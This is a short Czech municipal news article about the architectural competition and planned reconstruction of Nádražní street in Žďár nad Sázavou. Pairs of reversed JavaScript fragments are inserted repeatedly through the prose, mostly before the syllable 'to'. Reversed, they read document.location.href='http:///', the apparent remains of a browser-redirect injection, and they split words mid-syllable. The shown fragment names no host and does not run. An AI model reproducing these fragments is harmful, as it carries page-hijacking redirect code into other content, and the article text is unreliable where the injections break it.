Rainbow page separator

Výběr projektanta na přestavbu Nádražní ulice spěje do finále

Pátek, 19. května 2017

Žďár nad Sázavou / Do finále se blíží výběr architek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonického návrhu, podle kterého bude připraven projekt na nový vzhled Nádražní ulice. Vedení žďárské radnice by s ohledem na nutnost zahájení projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování chtělo mít jasno do konce měsíce. V současné době probíhá řízení bez uveřejnění, v němž byli osloveni au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toři prvních tří nejúspěšnějších návrhů, které vzešly z architek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonické soutěže. Realizován bude ten, který bude pro měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nejoptimálnější i s ohledem na ekonomickou náročnost projektu.
Aktuálně jsou nejlepší návrhy vystaveny na panelech na pěší zóně v Nádražní ulici a do konce měsíce budou všechny návrhy, které porota posuzovala, k vidění ve Staré radnici.
S první etapou přestavby Nádražní ulice měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to počítá příští rok. Uskuteční se v úseku od pošty k okružní křižovatce u parku „U Ivana“ a bude jí předcházet generální rekonstrukce rozvodů vody a kanalizace pod komunikacemi, jejímž většinovým inves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torem bude Svaz vodovodů a kanalizací Žďársko. Stavební práce by na sebe měly navazovat podobným způsobem, jako [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu bylo při rekonstrukci Smetanovy ulice.